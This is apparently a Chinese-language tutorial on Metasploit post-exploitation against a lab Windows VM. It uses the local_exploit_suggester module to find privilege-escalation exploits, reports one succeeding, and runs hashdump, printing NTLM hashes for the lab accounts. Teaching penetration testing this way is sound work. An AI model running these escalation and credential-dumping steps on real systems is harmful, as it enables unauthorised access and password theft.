后渗透操作
那msf中的post模块就是一个后渗透模块,里面包含各种后渗透中有可能用到的功能,最多的就是信息收集。
那么我这边就模拟一下拿到cmdshell后的操作:
可以看到,我这边sessions是有一个meterpreter会话:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | msf5 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows liuwx-PC\liuwx @ LIUWX-PC 192.168.119.136:8888 -> 192.168.119.139:49162 (192.168.119.139) msf5 exploit(multi/handler) > sessions 1 [*] Starting interaction with 1... meterpreter > |
在后渗透的时候,我们可以使用post模块辅助我们
1 2 3 4 5 6 | post/multi/recon/local_exploit_suggester post/windows/gather/hashdump post/windows/gather/smart_hashdump post/multi/gather/firefox_creds post/multi/gather/ssh_credspost/windows/gather/enumapplicatio ...等等 |
post/multi/recon/local_exploit_suggester
假设我们拿到一个cmdshell,但是权限很小,那我们可以使用这个模块来建议我们提权:
下面是它的一个介绍:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | msf5 > info post/multi/recon/local_exploit_suggester
Name: Multi Recon Local Exploit Suggester
Module: post/multi/recon/local_exploit_suggester
Platform: Unknown, Windows, Netware, Android, Java, R, Ruby, Linux, Cisco, Juniper, Unifi, Brocade, Solaris, OSX, BSD, OpenBSD, BSDi, NetBSD, FreeBSD, AIX, HPUX, Irix, Unix, PHP, JavaScript, Python, NodeJS, Firefox, Mainframe, Multi, Hardware, Apple_iOS
Arch:
Rank: Normal
Provided by:
sinn3r <sinn3r@metasploit.com>
Mo
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
Description:
This module suggests local meterpreter exploits that can be used.
The exploits are suggested based on the architecture and platform
that the user has a shell opened as well as the available exploits
in meterpreter. It's important to note that not all local exploits
will be fired. Exploits are chosen based on these conditions:
session type, platform, architecture, and required default options.
|
从上面的banner可以看到,它支持的平台挺多的,比如windows、Android…等等
run运行后它会比较慢,因为它会查询systeminfo来看看那些补丁没打,从而探测可以使用那些exploit来进行提权:
1 2 3 4 5 6 7 | meterpreter > run post/multi/recon/local_exploit_suggester [*] 192.168.119.139 - Collecting local exploits for x64/windows... [*] 192.168.119.139 - 11 exploit checks are being tried... [+] 192.168.119.139 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 192.168.119.139 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. |
run执行完毕后,msf给出了我们两个exploit:
1 2 3 | exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. |
我使用ms10_092_schelevator提权失败了,然后又下面这个成功提权!
hashdump
hashdump是查询密码:
因为有时候你得搜集密码来进行爆破别的用户
1 2 3 4 5 6 | meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: hack:1001:aad3b435b51404eeaad3b435b51404ee:f39934a2710a469b3c63ce1487794514::: liuwx:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: |
交流群:
微信公众号:
知识星球:
